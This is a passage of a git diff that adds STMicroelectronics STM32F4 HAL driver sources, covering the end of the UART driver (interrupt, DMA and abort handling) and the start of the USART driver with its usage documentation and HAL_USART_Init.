+{ + huart->pRxBuffPtr = pData; + huart->RxXferSize = Size; + huart->RxXferCount = Size; + + huart->ErrorCode = HAL_UART_ERROR_NONE; + huart->RxState = HAL_UART_STATE_BUSY_RX; + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + /* Enable the UART Parity Error Interrupt */ + __HAL_UART_ENABLE_IT(huart, UART_IT_PE); + + /* Enable the UART Error Interrupt: (Frame error, noise error, overrun error) */ + __HAL_UART_ENABLE_IT(huart, UART_IT_ERR); + + /* Enable the UART Data Register not empty Interrupt */ + __HAL_UART_ENABLE_IT(huart, UART_IT_RXNE); + + return HAL_OK; +} + +/** + * @brief Start Receive operation in DMA mode. + * @note This function could be called by all HAL UART API providing reception in DMA mode. + * @note When calling this function, parameters validity is considered as already checked, + * i.e. Rx State, buffer address, ... + * UART Handle is assumed as Locked. + * @param huart UART handle. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be received. + * @retval HAL status + */ +HAL_StatusTypeDef UART_Start_Receive_DMA(UART_HandleTypeDef *huart, uint8_t *pData, uint16_t Size) +{ + uint32_t *tmp; + + huart->pRxBuffPtr = pData; + huart->RxXferSize = Size; + + huart->ErrorCode = HAL_UART_ERROR_NONE; + huart->RxState = HAL_UART_STATE_BUSY_RX; + + /* Set the UART DMA transfer complete callback */ + huart->hdmarx->XferCpltCallback = UART_DMAReceiveCplt; + + /* Set the UART DMA Half transfer complete callback */ + huart->hdmarx->XferHalfCpltCallback = UART_DMARxHalfCplt; + + /* Set the DMA error callback */ + huart->hdmarx->XferErrorCallback = UART_DMAError; + + /* Set the DMA abort callback */ + huart->hdmarx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + tmp = (uint32_t *)&pData; + HAL_DMA_Start_IT(huart->hdmarx, (uint32_t)&huart->Instance->DR, *(uint32_t *)tmp, Size); + + /* Clear the Overrun flag just before enabling the DMA Rx request: can be mandatory for the second transfer */ + __HAL_UART_CLEAR_OREFLAG(huart); + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + /* Enable the UART Parity Error Interrupt */ + ATOMIC_SET_BIT(huart->Instance->CR1, USART_CR1_PEIE); + + /* Enable the UART Error Interrupt: (Frame error, noise error, overrun error) */ + ATOMIC_SET_BIT(huart->Instance->CR3, USART_CR3_EIE); + + /* Enable the DMA transfer for the receiver request by setting the DMAR bit + in the UART CR3 register */ + ATOMIC_SET_BIT(huart->Instance->CR3, USART_CR3_DMAR); + + return HAL_OK; +} + +/** + * @brief End ongoing Tx transfer on UART peripheral (following error detection or Transmit completion). + * @param huart UART handle. + * @retval None + */ +static void UART_EndTxTransfer(UART_HandleTypeDef *huart) +{ + /* Disable TXEIE and TCIE interrupts */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_TXEIE | USART_CR1_TCIE)); + + /* At end of Tx process, restore huart->gState to Ready */ + huart->gState = HAL_UART_STATE_READY; +} + +/** + * @brief End ongoing Rx transfer on UART peripheral (following error detection or Reception completion). + * @param huart UART handle. + * @retval None + */ +static void UART_EndRxTransfer(UART_HandleTypeDef *huart) +{ + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE)); + ATOMIC_CLEAR_BIT(huart->Instance->CR3, USART_CR3_EIE); + + /* In case of reception waiting for IDLE event, disable also the IDLE IE interrupt source */ + if (huart->ReceptionType == HAL_UART_RECEPTION_TOIDLE) + { + ATOMIC_CLEAR_BIT(huart->Instance->CR1, USART_CR1_IDLEIE); + } + + /* At end of Rx process, restore huart->RxState to Ready */ + huart->RxState = HAL_UART_STATE_READY; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; +} + +/** + * @brief DMA UART communication abort callback, when initiated by HAL services on Error + * (To be called at end of DMA Abort procedure following error occurrence). + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void UART_DMAAbortOnError(DMA_HandleTypeDef *hdma) +{ + UART_HandleTypeDef *huart = (UART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + huart->RxXferCount = 0x00U; + huart->TxXferCount = 0x00U; + +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + huart->ErrorCallback(huart); +#else + /*Call legacy weak error callback*/ + HAL_UART_ErrorCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA UART Tx communication abort callback, when initiated by user + * (To be called at end of DMA Tx Abort procedure following user abort request). + * @note When this callback is executed, User Abort complete call back is called only if no + * Abort still ongoing for Rx DMA Handle. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void UART_DMATxAbortCallback(DMA_HandleTypeDef *hdma) +{ + UART_HandleTypeDef *huart = (UART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + huart->hdmatx->XferAbortCallback = NULL; + + /* Check if an Abort process is still ongoing */ + if (huart->hdmarx != NULL) + { + if (huart->hdmarx->XferAbortCallback != NULL) + { + return; + } + } + + /* No Abort process still ongoing : All DMA channels are aborted, call user Abort Complete callback */ + huart->TxXferCount = 0x00U; + huart->RxXferCount = 0x00U; + + /* Reset ErrorCode */ + huart->ErrorCode = HAL_UART_ERROR_NONE; + + /* Restore huart->gState and huart->RxState to Ready */ + huart->gState = HAL_UART_STATE_READY; + huart->RxState = HAL_UART_STATE_READY; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + /* Call user Abort complete callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /* Call registered Abort complete callback */ + huart->AbortCpltCallback(huart); +#else + /* Call legacy weak Abort complete callback */ + HAL_UART_AbortCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA UART Rx communication abort callback, when initiated by user + * (To be called at end of DMA Rx Abort procedure following user abort request). + * @note When this callback is executed, User Abort complete call back is called only if no + * Abort still ongoing for Tx DMA Handle. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void UART_DMARxAbortCallback(DMA_HandleTypeDef *hdma) +{ + UART_HandleTypeDef *huart = (UART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + huart->hdmarx->XferAbortCallback = NULL; + + /* Check if an Abort process is still ongoing */ + if (huart->hdmatx != NULL) + { + if (huart->hdmatx->XferAbortCallback != NULL) + { + return; + } + } + + /* No Abort process still ongoing : All DMA channels are aborted, call user Abort Complete callback */ + huart->TxXferCount = 0x00U; + huart->RxXferCount = 0x00U; + + /* Reset ErrorCode */ + huart->ErrorCode = HAL_UART_ERROR_NONE; + + /* Restore huart->gState and huart->RxState to Ready */ + huart->gState = HAL_UART_STATE_READY; + huart->RxState = HAL_UART_STATE_READY; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + /* Call user Abort complete callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /* Call registered Abort complete callback */ + huart->AbortCpltCallback(huart); +#else + /* Call legacy weak Abort complete callback */ + HAL_UART_AbortCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA UART Tx communication abort callback, when initiated by user by a call to + * HAL_UART_AbortTransmit_IT API (Abort only Tx transfer) + * (This callback is executed at end of DMA Tx Abort procedure following user abort request, + * and leads to user Tx Abort Complete callback execution). + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void UART_DMATxOnlyAbortCallback(DMA_HandleTypeDef *hdma) +{ + UART_HandleTypeDef *huart = (UART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + huart->TxXferCount = 0x00U; + + /* Restore huart->gState to Ready */ + huart->gState = HAL_UART_STATE_READY; + + /* Call user Abort complete callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /* Call registered Abort Transmit Complete Callback */ + huart->AbortTransmitCpltCallback(huart); +#else + /* Call legacy weak Abort Transmit Complete Callback */ + HAL_UART_AbortTransmitCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA UART Rx communication abort callback, when initiated by user by a call to + * HAL_UART_AbortReceive_IT API (Abort only Rx transfer) + * (This callback is executed at end of DMA Rx Abort procedure following user abort request, + * and leads to user Rx Abort Complete callback execution). + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void UART_DMARxOnlyAbortCallback(DMA_HandleTypeDef *hdma) +{ + UART_HandleTypeDef *huart = (UART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + huart->RxXferCount = 0x00U; + + /* Restore huart->RxState to Ready */ + huart->RxState = HAL_UART_STATE_READY; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + /* Call user Abort complete callback */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /* Call registered Abort Receive Complete Callback */ + huart->AbortReceiveCpltCallback(huart); +#else + /* Call legacy weak Abort Receive Complete Callback */ + HAL_UART_AbortReceiveCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ +} + +/** + * @brief Sends an amount of data in non blocking mode. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +static HAL_StatusTypeDef UART_Transmit_IT(UART_HandleTypeDef *huart) +{ + uint16_t *tmp; + + /* Check that a Tx process is ongoing */ + if (huart->gState == HAL_UART_STATE_BUSY_TX) + { + if ((huart->Init.WordLength == UART_WORDLENGTH_9B) && (huart->Init.Parity == UART_PARITY_NONE)) + { + tmp = (uint16_t *) huart->pTxBuffPtr; + huart->Instance->DR = (uint16_t)(*tmp & (uint16_t)0x01FF); + huart->pTxBuffPtr += 2U; + } + else + { + huart->Instance->DR = (uint8_t)(*huart->pTxBuffPtr++ & (uint8_t)0x00FF); + } + + if (--huart->TxXferCount == 0U) + { + /* Disable the UART Transmit Complete Interrupt */ + __HAL_UART_DISABLE_IT(huart, UART_IT_TXE); + + /* Enable the UART Transmit Complete Interrupt */ + __HAL_UART_ENABLE_IT(huart, UART_IT_TC); + } + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Wraps up transmission in non blocking mode. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +static HAL_StatusTypeDef UART_EndTransmit_IT(UART_HandleTypeDef *huart) +{ + /* Disable the UART Transmit Complete Interrupt */ + __HAL_UART_DISABLE_IT(huart, UART_IT_TC); + + /* Tx process is ended, restore huart->gState to Ready */ + huart->gState = HAL_UART_STATE_READY; + +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered Tx complete callback*/ + huart->TxCpltCallback(huart); +#else + /*Call legacy weak Tx complete callback*/ + HAL_UART_TxCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + + return HAL_OK; +} + +/** + * @brief Receives an amount of data in non blocking mode + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +static HAL_StatusTypeDef UART_Receive_IT(UART_HandleTypeDef *huart) +{ + uint8_t *pdata8bits; + uint16_t *pdata16bits; + + /* Check that a Rx process is ongoing */ + if (huart->RxState == HAL_UART_STATE_BUSY_RX) + { + if ((huart->Init.WordLength == UART_WORDLENGTH_9B) && (huart->Init.Parity == UART_PARITY_NONE)) + { + pdata8bits = NULL; + pdata16bits = (uint16_t *) huart->pRxBuffPtr; + *pdata16bits = (uint16_t)(huart->Instance->DR & (uint16_t)0x01FF); + huart->pRxBuffPtr += 2U; + } + else + { + pdata8bits = (uint8_t *) huart->pRxBuffPtr; + pdata16bits = NULL; + + if ((huart->Init.WordLength == UART_WORDLENGTH_9B) || ((huart->Init.WordLength == UART_WORDLENGTH_8B) && (huart->Init.Parity == UART_PARITY_NONE))) + { + *pdata8bits = (uint8_t)(huart->Instance->DR & (uint8_t)0x00FF); + } + else + { + *pdata8bits = (uint8_t)(huart->Instance->DR & (uint8_t)0x007F); + } + huart->pRxBuffPtr += 1U; + } + + if (--huart->RxXferCount == 0U) + { + /* Disable the UART Data Register not empty Interrupt */ + __HAL_UART_DISABLE_IT(huart, UART_IT_RXNE); + + /* Disable the UART Parity Error Interrupt */ + __HAL_UART_DISABLE_IT(huart, UART_IT_PE); + + /* Disable the UART Error Interrupt: (Frame error, noise error, overrun error) */ + __HAL_UART_DISABLE_IT(huart, UART_IT_ERR); + + /* Rx process is completed, restore huart->RxState to Ready */ + huart->RxState = HAL_UART_STATE_READY; + + /* Check current reception Mode : + If Reception till IDLE event has been selected : */ + if (huart->ReceptionType == HAL_UART_RECEPTION_TOIDLE) + { + /* Set reception type to Standard */ + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + /* Disable IDLE interrupt */ + ATOMIC_CLEAR_BIT(huart->Instance->CR1, USART_CR1_IDLEIE); + + /* Check if IDLE flag is set */ + if (__HAL_UART_GET_FLAG(huart, UART_FLAG_IDLE)) + { + /* Clear IDLE flag in ISR */ + __HAL_UART_CLEAR_IDLEFLAG(huart); + } + +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered Rx Event callback*/ + huart->RxEventCallback(huart, huart->RxXferSize); +#else + /*Call legacy weak Rx Event callback*/ + HAL_UARTEx_RxEventCallback(huart, huart->RxXferSize); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + else + { + /* Standard reception API called */ +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + /*Call registered Rx complete callback*/ + huart->RxCpltCallback(huart); +#else + /*Call legacy weak Rx complete callback*/ + HAL_UART_RxCpltCallback(huart); +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + } + + return HAL_OK; + } + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Configures the UART peripheral. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval None + */ +static void UART_SetConfig(UART_HandleTypeDef *huart) +{ + uint32_t tmpreg; + uint32_t pclk; + + /* Check the parameters */ + assert_param(IS_UART_BAUDRATE(huart->Init.BaudRate)); + assert_param(IS_UART_STOPBITS(huart->Init.StopBits)); + assert_param(IS_UART_PARITY(huart->Init.Parity)); + assert_param(IS_UART_MODE(huart->Init.Mode)); + + /*-------------------------- USART CR2 Configuration -----------------------*/ + /* Configure the UART Stop Bits: Set STOP[13:12] bits + according to huart->Init.StopBits value */ + MODIFY_REG(huart->Instance->CR2, USART_CR2_STOP, huart->Init.StopBits); + + /*-------------------------- USART CR1 Configuration -----------------------*/ + /* Configure the UART Word Length, Parity and mode: + Set the M bits according to huart->Init.WordLength value + Set PCE and PS bits according to huart->Init.Parity value + Set TE and RE bits according to huart->Init.Mode value + Set OVER8 bit according to huart->Init.OverSampling value */ + + tmpreg = (uint32_t)huart->Init.WordLength | huart->Init.Parity | huart->Init.Mode | huart->Init.OverSampling; + MODIFY_REG(huart->Instance->CR1, + (uint32_t)(USART_CR1_M | USART_CR1_PCE | USART_CR1_PS | USART_CR1_TE | USART_CR1_RE | USART_CR1_OVER8), + tmpreg); + + /*-------------------------- USART CR3 Configuration -----------------------*/ + /* Configure the UART HFC: Set CTSE and RTSE bits according to huart->Init.HwFlowCtl value */ + MODIFY_REG(huart->Instance->CR3, (USART_CR3_RTSE | USART_CR3_CTSE), huart->Init.HwFlowCtl); + + +#if defined(USART6) && defined(UART9) && defined(UART10) + if ((huart->Instance == USART1) || (huart->Instance == USART6) || (huart->Instance == UART9) || (huart->Instance == UART10)) + { + pclk = HAL_RCC_GetPCLK2Freq(); + } +#elif defined(USART6) + if ((huart->Instance == USART1) || (huart->Instance == USART6)) + { + pclk = HAL_RCC_GetPCLK2Freq(); + } +#else + if (huart->Instance == USART1) + { + pclk = HAL_RCC_GetPCLK2Freq(); + } +#endif /* USART6 */ + else + { + pclk = HAL_RCC_GetPCLK1Freq(); + } + /*-------------------------- USART BRR Configuration ---------------------*/ + if (huart->Init.OverSampling == UART_OVERSAMPLING_8) + { + huart->Instance->BRR = UART_BRR_SAMPLING8(pclk, huart->Init.BaudRate); + } + else + { + huart->Instance->BRR = UART_BRR_SAMPLING16(pclk, huart->Init.BaudRate); + } +} + +/** + * @} + */ + +#endif /* HAL_UART_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_usart.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_usart.c new file mode 100644 index 000000000..0af05821f --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_usart.c @@ -0,0 +1,2824 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_usart.c + * @author MCD Application Team + * @brief USART HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Universal Synchronous/Asynchronous Receiver Transmitter + * Peripheral (USART). + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The USART HAL driver can be used as follows: + + (#) Declare a USART_HandleTypeDef handle structure (eg. USART_HandleTypeDef husart). + (#) Initialize the USART low level resources by implementing the HAL_USART_MspInit() API: + (##) Enable the USARTx interface clock. + (##) USART pins configuration: + (+++) Enable the clock for the USART GPIOs. + (+++) Configure the USART pins as alternate function pull-up. + (##) NVIC configuration if you need to use interrupt process (HAL_USART_Transmit_IT(), + HAL_USART_Receive_IT() and HAL_USART_TransmitReceive_IT() APIs): + (+++) Configure the USARTx interrupt priority. + (+++) Enable the NVIC USART IRQ handle. + (##) DMA Configuration if you need to use DMA process (HAL_USART_Transmit_DMA() + HAL_USART_Receive_DMA() and HAL_USART_TransmitReceive_DMA() APIs): + (+++) Declare a DMA handle structure for the Tx/Rx stream. + (+++) Enable the DMAx interface clock. + (+++) Configure the declared DMA handle structure with the required Tx/Rx parameters. + (+++) Configure the DMA Tx/Rx stream. + (+++) Associate the initialized DMA handle to the USART DMA Tx/Rx handle. + (+++) Configure the priority and enable the NVIC for the transfer complete interrupt on the DMA Tx/Rx stream. + (+++) Configure the USARTx interrupt priority and enable the NVIC USART IRQ handle + (used for last byte sending completion detection in DMA non circular mode) + + (#) Program the Baud Rate, Word Length, Stop Bit, Parity, Hardware + flow control and Mode(Receiver/Transmitter) in the husart Init structure. + + (#) Initialize the USART registers by calling the HAL_USART_Init() API: + (++) These APIs configures also the low level Hardware GPIO, CLOCK, CORTEX...etc) + by calling the customized HAL_USART_MspInit(&husart) API. + + -@@- The specific USART interrupts (Transmission complete interrupt, + RXNE interrupt and Error Interrupts) will be managed using the macros + __HAL_USART_ENABLE_IT() and __HAL_USART_DISABLE_IT() inside the transmit and receive process. + + (#) Three operation modes are available within this driver : + + *** Polling mode IO operation *** + ================================= + [..] + (+) Send an amount of data in blocking mode using HAL_USART_Transmit() + (+) Receive an amount of data in blocking mode using HAL_USART_Receive() + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Send an amount of data in non blocking mode using HAL_USART_Transmit_IT() + (+) At transmission end of transfer HAL_USART_TxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_USART_TxCpltCallback + (+) Receive an amount of data in non blocking mode using HAL_USART_Receive_IT() + (+) At reception end of transfer HAL_USART_RxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_USART_RxCpltCallback + (+) In case of transfer Error, HAL_USART_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_USART_ErrorCallback + + *** DMA mode IO operation *** + ============================== + [..] + (+) Send an amount of data in non blocking mode (DMA) using HAL_USART_Transmit_DMA() + (+) At transmission end of half transfer HAL_USART_TxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_USART_TxHalfCpltCallback + (+) At transmission end of transfer HAL_USART_TxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_USART_TxCpltCallback + (+) Receive an amount of data in non blocking mode (DMA) using HAL_USART_Receive_DMA() + (+) At reception end of half transfer HAL_USART_RxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_USART_RxHalfCpltCallback + (+) At reception end of transfer HAL_USART_RxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_USART_RxCpltCallback + (+) In case of transfer Error, HAL_USART_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_USART_ErrorCallback + (+) Pause the DMA Transfer using HAL_USART_DMAPause() + (+) Resume the DMA Transfer using HAL_USART_DMAResume() + (+) Stop the DMA Transfer using HAL_USART_DMAStop() + + *** USART HAL driver macros list *** + ============================================= + [..] + Below the list of most used macros in USART HAL driver. + + (+) __HAL_USART_ENABLE: Enable the USART peripheral + (+) __HAL_USART_DISABLE: Disable the USART peripheral + (+) __HAL_USART_GET_FLAG : Check whether the specified USART flag is set or not + (+) __HAL_USART_CLEAR_FLAG : Clear the specified USART pending flag + (+) __HAL_USART_ENABLE_IT: Enable the specified USART interrupt + (+) __HAL_USART_DISABLE_IT: Disable the specified USART interrupt + + [..] + (@) You can refer to the USART HAL driver header file for more useful macros + + ##### Callback registration ##### + ================================== + + [..] + The compilation define USE_HAL_USART_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + [..] + Use Function @ref HAL_USART_RegisterCallback() to register a user callback. + Function @ref HAL_USART_RegisterCallback() allows to register following callbacks: + (+) TxHalfCpltCallback : Tx Half Complete Callback. + (+) TxCpltCallback : Tx Complete Callback. + (+) RxHalfCpltCallback : Rx Half Complete Callback. + (+) RxCpltCallback : Rx Complete Callback. + (+) TxRxCpltCallback : Tx Rx Complete Callback. + (+) ErrorCallback : Error Callback. + (+) AbortCpltCallback : Abort Complete Callback. + (+) MspInitCallback : USART MspInit. + (+) MspDeInitCallback : USART MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + [..] + Use function @ref HAL_USART_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. + @ref HAL_USART_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) TxHalfCpltCallback : Tx Half Complete Callback. + (+) TxCpltCallback : Tx Complete Callback. + (+) RxHalfCpltCallback : Rx Half Complete Callback. + (+) RxCpltCallback : Rx Complete Callback. + (+) TxRxCpltCallback : Tx Rx Complete Callback. + (+) ErrorCallback : Error Callback. + (+) AbortCpltCallback : Abort Complete Callback. + (+) MspInitCallback : USART MspInit. + (+) MspDeInitCallback : USART MspDeInit. + + [..] + By default, after the @ref HAL_USART_Init() and when the state is HAL_USART_STATE_RESET + all callbacks are set to the corresponding weak (surcharged) functions: + examples @ref HAL_USART_TxCpltCallback(), @ref HAL_USART_RxHalfCpltCallback(). + Exception done for MspInit and MspDeInit functions that are respectively + reset to the legacy weak (surcharged) functions in the @ref HAL_USART_Init() + and @ref HAL_USART_DeInit() only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the @ref HAL_USART_Init() and @ref HAL_USART_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand). + + [..] + Callbacks can be registered/unregistered in HAL_USART_STATE_READY state only. + Exception done MspInit/MspDeInit that can be registered/unregistered + in HAL_USART_STATE_READY or HAL_USART_STATE_RESET state, thus registered (user) + MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using @ref HAL_USART_RegisterCallback() before calling @ref HAL_USART_DeInit() + or @ref HAL_USART_Init() function. + + [..] + When The compilation define USE_HAL_USART_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + [..] + (@) Additional remark: If the parity is enabled, then the MSB bit of the data written + in the data register is transmitted but is changed by the parity bit. + Depending on the frame length defined by the M bit (8-bits or 9-bits), + the possible USART frame formats are as listed in the following table: + +-------------------------------------------------------------+ + | M bit | PCE bit | USART frame | + |---------------------|---------------------------------------| + | 0 | 0 | | SB | 8 bit data | STB | | + |---------|-----------|---------------------------------------| + | 0 | 1 | | SB | 7 bit data | PB | STB | | + |---------|-----------|---------------------------------------| + | 1 | 0 | | SB | 9 bit data | STB | | + |---------|-----------|---------------------------------------| + | 1 | 1 | | SB | 8 bit data | PB | STB | | + +-------------------------------------------------------------+ + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup USART USART + * @brief HAL USART Synchronous module driver + * @{ + */ +#ifdef HAL_USART_MODULE_ENABLED +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup USART_Private_Constants + * @{ + */ +#define DUMMY_DATA 0xFFFFU +#define USART_TIMEOUT_VALUE 22000U +/** + * @} + */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/** @addtogroup USART_Private_Functions + * @{ + */ +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) +void USART_InitCallbacksToDefault(USART_HandleTypeDef *husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ +static void USART_EndTxTransfer(USART_HandleTypeDef *husart); +static void USART_EndRxTransfer(USART_HandleTypeDef *husart); +static HAL_StatusTypeDef USART_Transmit_IT(USART_HandleTypeDef *husart); +static HAL_StatusTypeDef USART_EndTransmit_IT(USART_HandleTypeDef *husart); +static HAL_StatusTypeDef USART_Receive_IT(USART_HandleTypeDef *husart); +static HAL_StatusTypeDef USART_TransmitReceive_IT(USART_HandleTypeDef *husart); +static void USART_SetConfig(USART_HandleTypeDef *husart); +static void USART_DMATransmitCplt(DMA_HandleTypeDef *hdma); +static void USART_DMATxHalfCplt(DMA_HandleTypeDef *hdma); +static void USART_DMAReceiveCplt(DMA_HandleTypeDef *hdma); +static void USART_DMARxHalfCplt(DMA_HandleTypeDef *hdma); +static void USART_DMAError(DMA_HandleTypeDef *hdma); +static void USART_DMAAbortOnError(DMA_HandleTypeDef *hdma); +static void USART_DMATxAbortCallback(DMA_HandleTypeDef *hdma); +static void USART_DMARxAbortCallback(DMA_HandleTypeDef *hdma); + +static HAL_StatusTypeDef USART_WaitOnFlagUntilTimeout(USART_HandleTypeDef *husart, uint32_t Flag, FlagStatus Status, + uint32_t Tickstart, uint32_t Timeout); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup USART_Exported_Functions USART Exported Functions + * @{ + */ + +/** @defgroup USART_Exported_Functions_Group1 USART Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + ============================================================================== + ##### Initialization and Configuration functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to initialize the USART + in asynchronous and in synchronous modes. + (+) For the asynchronous mode only these parameters can be configured: + (++) Baud Rate + (++) Word Length + (++) Stop Bit + (++) Parity: If the parity is enabled, then the MSB bit of the data written + in the data register is transmitted but is changed by the parity bit. + Depending on the frame length defined by the M bit (8-bits or 9-bits), + please refer to Reference manual for possible USART frame formats. + (++) USART polarity + (++) USART phase + (++) USART LastBit + (++) Receiver/transmitter modes + + [..] + The HAL_USART_Init() function follows the USART synchronous configuration + procedures (details for the procedures are available in reference manual + (RM0430 for STM32F4X3xx MCUs and RM0402 for STM32F412xx MCUs + RM0383 for STM32F411xC/E MCUs and RM0401 for STM32F410xx MCUs + RM0090 for STM32F4X5xx/STM32F4X7xx/STM32F429xx/STM32F439xx MCUs + RM0390 for STM32F446xx MCUs and RM0386 for STM32F469xx/STM32F479xx MCUs)). + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the USART mode according to the specified + * parameters in the USART_InitTypeDef and initialize the associated handle. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_Init(USART_HandleTypeDef *husart) +{ + /* Check the USART handle allocation */ + if (husart == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_USART_INSTANCE(husart->Instance)); + + if (husart->State == HAL_USART_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + husart->Lock = HAL_UNLOCKED; + +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + USART_InitCallbacksToDefault(husart); + + if (husart->MspInitCallback == NULL) + { + husart->MspInitCallback = HAL_USART_MspInit; + } + + /* Init the low level hardware */ + husart->MspInitCallback(husart); +#else + /* Init the low level hardware : GPIO, CLOCK */ + HAL_USART_MspInit(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + } + + husart->State = HAL_USART_STATE_BUSY; + + /* Set the USART Communication parameters */ + USART_SetConfig(husart); + + /* In USART mode, the following bits must be kept cleared: + - LINEN bit in the USART_CR2 register + - HDSEL, SCEN and IREN bits in the USART_CR3 register */ + CLEAR_BIT(husart->Instance->CR2, USART_CR2_LINEN); + CLEAR_BIT(husart->Instance->CR3, (USART_CR3_SCEN | USART_CR3_HDSEL | USART_CR3_IREN)); + + /* 